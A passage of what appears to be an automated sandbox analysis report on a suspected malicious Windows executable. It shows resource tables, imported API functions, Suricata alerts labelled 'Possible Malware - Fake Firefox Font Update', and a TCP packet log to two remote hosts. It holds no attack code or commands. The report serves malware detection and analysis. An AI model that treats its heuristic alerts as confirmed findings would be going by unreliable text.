                                                                RT_STRING0x12a1a00x2fcdata0.4463350785340314
                                                                RT_STRING0x12a49c0xa8data0.7202380952380952
                                                                RT_STRING0x12a5440x15cdata0.5545977011494253
                                                                RT_STRING0x12a6a00x148data0.5701219512195121
                                                                RT_STRING0x12a7e80x478data0.38636363636363635
                                                                RT_STRING0x12ac600x35cdata0.40232558139534885
                                                                RT_STRING0x12afbc0x3b8data0.39705882352941174
                                                                RT_STRING0x12b3740x3e8data0.349
                                                                RT_STRING0x12b75c0x214data0.49624060150375937
                                                                RT_STRING0x12b9700xccdata0.6274509803921569
                                                                RT_STRING0x12ba3c0x194data0.5643564356435643
                                                                RT_STRING0x12bbd00x3c4data0.3288381742738589
                                                                RT_STRING0x12bf940x338data0.42961165048543687
                                                                RT_STRING0x12c2cc0x294data0.42424242424242425
                                                                RT_RCDATA0x12c5600x10data1.5
                                                                RT_RCDATA0x12c5700x318data0.6982323232323232
                                                                RT_RCDATA0x12c8880x5078eGIF image data, version 89a, 280 x 280EnglishUnited States0.881148858968369
                                                                RT_RCDATA0x17d0180x107Delphi compiled form 'TForm1'0.8098859315589354
                                                                RT_GROUP_CURSOR0x17d1200x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                RT_GROUP_CURSOR0x17d1340x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                RT_GROUP_CURSOR0x17d1480x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                RT_GROUP_CURSOR0x17d15c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                RT_GROUP_CURSOR0x17d1700x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                RT_GROUP_CURSOR0x17d1840x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                RT_GROUP_CURSOR0x17d1980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                RT_GROUP_ICON0x17d1ac0x4cdata0.8289473684210527

                                                                Imports

                                                                DLLImport
                                                                oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                                kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CreateFileA, CloseHandle
                                                                kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, ValidateRect, UpdateWindow, UnregisterHotKey, UnregisterClassA, UnionRect, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetKeyboardState, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCaretPos, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindowEx, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterHotKey, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, IsCharAlphaNumericA, IsCharAlphaA, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDoubleClickTime, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCaretPos, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DestroyCaret, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, CreateCaret, CloseClipboard, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWindowExtEx, SetWinMetaFileBits, SetViewportOrgEx, SetViewportExtEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, PolyPolyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExtTextOutA, ExtCreatePen, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                                                version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFileTime, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileTime, GetFileAttributesA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                                                kernel32.dllSleep
                                                                oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                shell32.dllSHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder, SHBrowseForFolderA
                                                                comdlg32.dllGetOpenFileNameA
                                                                kernel32.dllMulDiv

                                                                Possible Origin

                                                                Language of compilation systemCountry where language is spokenMap
                                                                EnglishUnited States

                                                                Network Behavior

                                                                Suricata IDS Alerts

                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-12-24T11:28:42.529127+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1149705172.217.19.238443TCP
                                                                2024-12-24T11:28:45.321881+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1149707142.250.181.1443TCP

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 24, 2024 11:28:40.784699917 CET49704443192.168.2.11172.217.19.238
                                                                Dec 24, 2024 11:28:40.784756899 CET44349704172.217.19.238192.168.2.11
                                                                Dec 24, 2024 11:28:40.784889936 CET49704443192.168.2.11172.217.19.238
                                                                Dec 24, 2024 11:28:40.786015987 CET49704443192.168.2.11172.217.19.238
                                                                Dec 24, 2024 11:28:40.786070108 CET44349704172.217.19.238192.168.2.11
                                                                Dec 24, 2024 11:28:40.786453962 CET49704443192.168.2.11172.217.19.238
                                                                Dec 24, 2024 11:28:40.829557896 CET49705443192.168.2.11172.217.19.238
                                                                Dec 24, 2024 11:28:40.829605103 CET44349705172.217.19.238192.168.2.11
                                                                Dec 24, 2024 11:28:40.829679012 CET49705443192.168.2.11172.217.19.238
                                                                Dec 24, 2024 11:28:40.832338095 CET49705443192.168.2.11172.217.19.238
                                                                Dec 24, 2024 11:28:40.832355022 CET44349705172.217.19.238192.168.2.11
                                                                Dec 24, 2024 11:28:42.529052973 CET44349705172.217.19.238192.168.2.11
                                                                Dec 24, 2024 11:28:42.529126883 CET49705443192.168.2.11172.217.19.238
                                                                Dec 24, 2024 11:28:42.530160904 CET44349705172.217.19.238192.168.2.11
                                                                Dec 24, 2024 11:28:42.530220032 CET49705443192.168.2.11172.217.19.238
                                                                Dec 24, 2024 11:28:42.534663916 CET49705443192.168.2.11172.217.19.238
                                                                Dec 24, 2024 11:28:42.534673929 CET44349705172.217.19.238192.168.2.11
                                                                Dec 24, 2024 11:28:42.534924984 CET44349705172.217.19.238192.168.2.11
                                                                Dec 24, 2024 11:28:42.578819036 CET49705443192.168.2.11172.217.19.238
                                                                Dec 24, 2024 11:28:42.597975969 CET49705443192.168.2.11172.217.19.238
                                                                Dec 24, 2024 11:28:42.639341116 CET44349705172.217.19.238192.168.2.11
                                                                Dec 24, 2024 11:28:43.427071095 CET44349705172.217.19.238192.168.2.11
                                                                Dec 24, 2024 11:28:43.432374001 CET44349705172.217.19.238192.168.2.11
                                                                Dec 24, 2024 11:28:43.435175896 CET49705443192.168.2.11172.217.19.238
                                                                Dec 24, 2024 11:28:43.436203003 CET49705443192.168.2.11172.217.19.238
                                                                Dec 24, 2024 11:28:43.436218977 CET44349705172.217.19.238192.168.2.11
                                                                Dec 24, 2024 11:28:43.436228991 CET49705443192.168.2.11172.217.19.238
                                                                Dec 24, 2024 11:28:43.436233997 CET44349705172.217.19.238192.168.2.11
                                                                Dec 24, 2024 11:28:43.619460106 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:43.619504929 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:43.619595051 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:43.619951010 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:43.619963884 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:45.321810007 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:45.321881056 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:45.323477983 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:45.323491096 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:45.323822021 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:45.325788021 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:45.367335081 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:48.728954077 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:48.729088068 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:48.729336023 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:48.729420900 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:48.848680973 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:48.848793030 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:48.852495909 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:48.860879898 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:48.860949039 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:48.860960960 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:48.869271040 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:48.869335890 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:48.869343996 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:48.877831936 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:48.877906084 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:48.877916098 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:48.886104107 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:48.886193991 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:48.886202097 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:48.894462109 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:48.894545078 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:48.894553900 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:48.902846098 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:48.902909994 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:48.902920008 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:48.919519901 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:48.919590950 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:48.919600964 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:48.927964926 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:48.928020954 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:48.928029060 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:48.936263084 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:48.936337948 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:48.936347008 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:48.936376095 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:48.936434984 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:48.944760084 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:48.952923059 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:48.952986956 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:48.952997923 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:48.968283892 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:48.968333960 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:48.968344927 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:48.980485916 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:48.980535030 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:48.980545044 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.000351906 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.000422001 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.000437021 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.005703926 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.005759001 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.005769968 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.014056921 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.014110088 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.014125109 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.022871971 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.022953033 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.022964954 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.030780077 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.030836105 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.030847073 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.038995028 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.039046049 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.039057016 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.048650026 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.048701048 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.048715115 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.058226109 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.058276892 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.058290005 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.067943096 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.067987919 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.068001032 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.077116013 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.077167988 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.077182055 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.085935116 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.085989952 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.086000919 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.095629930 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.095690012 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.095700979 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.105732918 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.105777979 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.105787992 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.115271091 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.115335941 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.115344048 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.124962091 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.125008106 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.125017881 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.134188890 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.134243011 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.134243965 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.134258032 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.134334087 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.142920971 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.144289970 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.144350052 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.144364119 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.153780937 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.153826952 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.153840065 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.161516905 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.161561012 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.161572933 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.171188116 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.171232939 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.171242952 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.179606915 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.179671049 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.179678917 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.182822943 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.182869911 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.182878017 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.188913107 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.188956022 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.188965082 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.194598913 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.194643021 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.194650888 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.200578928 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.200638056 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.200650930 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.206288099 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.206336975 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.206345081 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.210994959 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.211040020 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.211049080 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.216166973 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.216212988 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.216644049 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.220325947 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.220388889 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.220397949 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.225317001 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.225378990 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.225388050 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.230554104 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.230596066 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.230603933 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.235754013 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.235790014 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.235800028 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.241154909 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.241221905 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.241239071 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.245681047 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.245727062 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.245735884 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.250941038 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.250987053 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.250994921 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.255776882 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.255825043 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.255832911 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.260637045 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.260683060 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.260693073 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.265619993 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.265662909 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.265671968 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.270453930 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.270498037 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.270505905 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.275232077 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.275274992 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.275285006 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.280055046 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.280114889 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.280122995 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.284661055 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.284702063 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.284712076 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.289515018 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.289565086 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.289572954 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.294055939 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.294117928 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.294126034 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.298644066 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.298702002 CET49707443192.168.2.11142.250.181.1
